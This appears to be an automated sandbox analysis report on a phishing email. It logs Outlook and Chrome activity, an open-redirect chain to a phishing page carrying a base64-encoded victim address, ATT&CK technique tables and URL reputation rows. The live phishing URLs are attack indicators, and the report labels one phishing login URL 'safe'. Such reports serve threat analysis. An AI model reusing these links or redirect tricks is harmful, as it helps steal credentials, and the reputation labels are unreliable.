              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownHTTPS traffic detected: 40.126.29.12:443 -> 192.168.2.16:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.29.12:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49817 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_6544_1382401243Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dllJump to behavior
              Source: classification engineClassification label: mal80.phis.winEML@37/89@38/15
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmpJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240202T2017230089-4412.etlJump to behavior
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\dudick SystemDesk Important Crediential Notification 1.eml
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4D284E4F-3A7D-4622-868A-062F51C2E027" "7456C4E0-F4FD-42C9-A562-F537B3C4256C" "4412" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2072,i,10138071190065889849,3391501485592805015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2008,i,13169059896536106163,9047257998414387997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1616 --field-trial-handle=1988,i,16673131194630306312,13924574274350384022,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4D284E4F-3A7D-4622-868A-062F51C2E027" "7456C4E0-F4FD-42C9-A562-F537B3C4256C" "4412" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnxJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2072,i,10138071190065889849,3391501485592805015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2008,i,13169059896536106163,9047257998414387997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1616 --field-trial-handle=1988,i,16673131194630306312,13924574274350384022,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32Jump to behavior
              Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Drive-by Compromise
              Windows Management Instrumentation1
              DLL Side-Loading
              1
              Process Injection
              11
              Masquerading
              OS Credential Dumping1
              Process Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory13
              System Information Discovery
              Remote Desktop ProtocolData from Removable Media3
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1385782 Sample: dudick SystemDesk Important... Startdate: 02/02/2024 Architecture: WINDOWS Score: 80 35 Phishing site detected (based on favicon image match) 2->35 37 Yara detected HtmlPhish62 2->37 39 Yara detected HtmlPhish54 2->39 41 3 other signatures 2->41 7 OUTLOOK.EXE 67 137 2->7         started        process3 process4 9 chrome.exe 9 7->9         started        12 chrome.exe 7->12         started        14 chrome.exe 7->14         started        16 ai.exe 7->16         started        dnsIp5 31 192.168.2.16, 138, 443, 49234 unknown unknown 9->31 33 239.255.255.250 unknown Reserved 9->33 18 chrome.exe 9->18         started        21 chrome.exe 12->21         started        23 chrome.exe 14->23         started        process6 dnsIp7 25 galeonconstruction.com 162.241.124.47, 443, 49730, 49731 UNIFIEDLAYER-AS-1US United States 18->25 27 part-0012.t-0009.t-msedge.net 13.107.213.40, 443, 49798, 49835 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->27 29 27 other IPs or domains 18->29

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico0%URL Reputationsafe
              https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg0%URL Reputationsafe
              https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif0%URL Reputationsafe
              https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif0%URL Reputationsafe
              https://aadcdn.msftauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg0%URL Reputationsafe
              https://react.q2zg22.ru/login0%Avira URL Cloudsafe
